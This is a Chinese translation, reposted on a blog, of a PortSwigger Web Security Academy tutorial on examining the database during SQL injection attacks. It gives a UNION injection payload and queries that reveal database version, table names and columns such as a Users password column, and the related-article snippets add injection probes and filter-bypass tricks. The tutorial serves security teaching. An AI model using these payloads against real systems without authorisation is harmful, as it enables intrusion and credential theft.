检查SQL注入攻击中的数据库

最新推荐文章于 2024-04-17 18:20:58 发布
最新推荐文章于 2024-04-17 18:20:58 发布
阅读量561 收藏 1
点赞数
分类专栏: PortSwigger学院 # SQL注入 文章标签: 网络安全
原文链接:https://portswigger.net/web-security/sql-injection/examining-the-database
版权

本文翻译自:https://portswigger.net/web-security/sql-injection/examining-the-database

在利用 SQL 注入漏洞时,通常需要收集有关数据库本身的一些信息。这包括数据库软件的类型和版本,以及数据库的内容,它包含的表和列。

查询数据库类型和版本

不同的数据库提供不同的查询版本的方式。您通常需要尝试不同的查询才能找到有效的查询,从而能够同时确定数据库软件的类型和版本。

确定某些热门数据库类型的数据库版本的查询如下:

DBS查询语句
Microsoft, MySQLSELECT @@version
OracleSELECT * FROM v$version
PostgreSQLSELECT version()

举个栗子,可以使用联合查询:

' UNION SELECT @@version--

这可能会返回以下输出,确认数据库是微软 SQL 服务器,以及正在使用的版本:

Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64)
Mar 18 2018 09:11:49
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows Server 2016 Standard 10.0 <X64> (Build 14393: ) (Hypervisor)

实验SQL注入攻击,查询Oracle上的数据库类型和版本

实验SQL注入攻击,查询MySQL和微软上的数据库类型和版本

列出数据库中的内容

大多数数据库类型(除了Oracle之外)都有一组称为 information schema 的视图,这些视图提供关于数据库的信息。

您可以通过查询以列出数据库中的表:information_schema.tables

SELECT * FROM information_schema.tables

返回信息如下:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
=====================================================
MyDatabase dbo Products BASE TABLE
MyDatabase dbo Users BASE TABLE
MyDatabase dbo Feedback BASE TABLE

该输出表明有三个表,分别为 ProductsUsersFeedback

然后,您可以查询 information_schema.columns 以列出各个表中的列:

SELECT * FROM information_schema.columns WHERE table_name = 'Users'

返回信息如下:

TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME DATA_TYPE
=================================================================
MyDatabase dbo Users UserId int
MyDatabase dbo Users Username varchar
MyDatabase dbo Users Password varchar

此输出显示指定表中的列以及每列的数据类型。

实验SQL注入攻击,列出非Oracle数据库中的数据库内容

Oracle上的 “information schema”

在Oracle上,您可以通过稍微不同的查询获得相同的信息。

您可以通过查询 all_tables 来列出表名:

SELECT * FROM all_tables

您可以通过查询 all_tab_columns 来列出列名:

SELECT * FROM all_tab_columns WHERE table_name = 'USERS'

实验SQL注入攻击,列出Oracle上的数据库内容

周无争
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2388
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sq...
SQL注入数据库的用法
weixin_44029504的博客
03-30 492
一、数据库的基本使用命令: Linux进入MySQL数据库: 查看所有库: 进入某个库: 查看库的表: 查询表的所有内容: 插入语句: 查询限定数据: 修改数据: order by进行排序: 可以使用order by判断列数:超出会报错 在库名为security的库,users和emails表,使用union实现联合查询 //注意:由于两表结构不同(users表–三列十...
mysql in sql注入_在 SQL 注入攻击检查数据库
weixin_36431489的博客
01-27 394
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy >>Examining the database >>Examining the database in SQL injection attacks...当利用 SQL 注入利用时,收集数据库本身的信息通常是必要的。这包括数据库软件的类型版本,还包括数据...
SQL注入
最新发布
weixin_73331134的博客
04-17 1758
+空格为注释#也为注释MySQL版本8.0以下授权为:GRANT ALL ON以上为:CREATE USER test@“host” IDENTIFIED BY “password” with_native_passwordSHOW DATABASES 列出所有数据库USE mysql;查看某一个数据库里的所有内容 或者是(SHOW TABLES FROM mysql)-----select语句查看当前时间查看当前选择的是哪个数据库查看当前登录数据库的用户查看数据路径。
SQL注入数据库判断
ma963852的博客
04-14 4013
01 网站类型数据库的联系 asp:SQLServer,Access .net :SQLServer php:Mysql,PostgreSql java:Oracle,Mysql 可以根据网站类型来大概确定后续测试数据库的优先级。 02 依据主机端口 如果可以对主机进行端口扫描,可以根据是否开启对应端口,来大概判断数据库类型Oracle 默认端口号:1521 SQL Server 默认端口号:1433 MySQL 默认端口号:3306 PostgreSql 默认端口号:54..
SQL注入数据库的判断
孤的博客
04-03 3750
方法一: 用@@datadir查看数据库安装目录,能否判断出 方法二: 通过各个数据库特有的数据表来判断 1、mssql数据库 http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1 2、access数据库 http://127.0.0.1/test.php?id=1 and (s...
Nginx防止SQL注入攻击的相关配置介绍
09-30
在Nginx防止SQL注入攻击是保护Web应用程序安全的重要环节。SQL注入是黑客利用恶意SQL语句侵入数据库的一种常见方法。以下是一些相关的配置介绍,这些配置可以帮助你阻止可能的SQL注入尝试。 首先,了解基本思路:...
sqlserver 数据库被注入解决方案
09-11
给应用连接数据库的用户分配最小必要的权限,这样即使有SQL注入攻击者也无法执行高权限的操作。 5. **错误处理和日志记录**: 设置合适的错误处理机制,不要在错误消息暴露过多的数据库信息。同时,记录所有...
PHP与SQL注入攻击[一]
10-30
SQL注入攻击的基本过程是这样的:攻击者通过在Web表单或其他用户输入点插入恶意的SQL代码,欺骗服务器执行非预期的数据库操作。例如,在上述示例攻击者提供的用户名变量`$name`包含了一个分号,用于分隔两个SQL...
SQL注入攻击.pdf
09-19
SQL注入攻击是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库系统。攻击者通过在输入字段插入恶意的SQL代码,试图绕过应用程序的安全控制,获取未经授权的数据访问、修改或删除数据,甚至...
防止SQL注入攻击
08-11
SQL注入攻击是一种常见的网络安全威胁,它利用了不安全的SQL语句设计,使得恶意用户可以通过输入特定的数据来操纵数据库。这种攻击方式可能导致数据泄露、数据篡改甚至整个系统的瘫痪。以下是一些关于防止SQL注入...
SQL手工注入大全,包含各种数据库
04-30
详细讲解各种数据库sql注入方法,不管是搞安全还是搞开发都可以看一看,希望大家下载!
SQL注入手工检测sql注入检测
04-21
sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测
MSSQL数据库注入
zhuangsle的博客
08-26 1035
MSSQL数据库注入实践 一、MSSQL注入的基础知识 (一)注入点的检测 1、数据库类型判断 概述 MSSQL数据库,存在一个系统表sysobjects,可以通过判断这个表是否存在来判断该数据库是否为MSSQL数据库 SQL语句执行 select * from admin where id=1 and exists(select * from sysobjects); # 正常返回结果,则表示存在该数据库表 select * from admin where id=1 and exists(se
MySQL注入未跑出数据库_[数据库]mysql注入绕过的一些技巧
weixin_34611130的博客
02-03 140
[数据库]mysql注入绕过的一些技巧0 2015-08-14 19:00:11虽然mysql + php的开发可以使用pdo,但是有些老久的程序没有使用,或其他原因1.注释绕过select/*comment*/user/*zzsdsdsf*/from mysql.user;2.内联注释绕过/*!12345select*//*!12345user*/ from mysql.use...
【SQL】SQL注入漏洞及相关实验(更新)精华!不看就亏了!
weixin_45844670的博客
08-26 1550
SQL注入原理:SQL注入的原理其实并不难理解,Web应用程序后台获取用户输入并将其拼接到SQL查询语句进行执行,而这里的用户输入就是我们可以构造恶意payload的地方,通过一些技巧使得查询语句按照我们所希望的方式执行即可完成一次成功的SQL注入。正如大多数的Web漏洞一样,究其漏洞本质就是未验证用户输入,没有实现输入数据与程序执行语句的分离。 但是由于存在不同的数据库(如常见的Oracle、SQL Server、Mysql等)所导致的具有微小差异性的SQL语句实现,以及我们无法直接观察到后台的查询逻辑
SQL注入攻击入门
xcxhzjl的博客
11-19 3670
目录 一、SQL注入的原理 SQL注入漏洞的条件 二、SQL注入的危害 三、SQL注入的分类 1、注入点数据类型分类 (1)数字型注入 (2)字符型注入 2、注入点位置分类 3、注入方法分类 (1)布尔型注入 (2)报错型注入 (3)延时注入 (4)联合查询注入 (5)宽字节注入 (6)多语句查询注入 四、SQL注入的防御 五、WAF绕过方法 六、SQLMAP 一、SQL注入的原理 SQL注入是一种针对后台数据库攻击手段,攻击者把精心构造的恶意SQL命令插入到Web

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值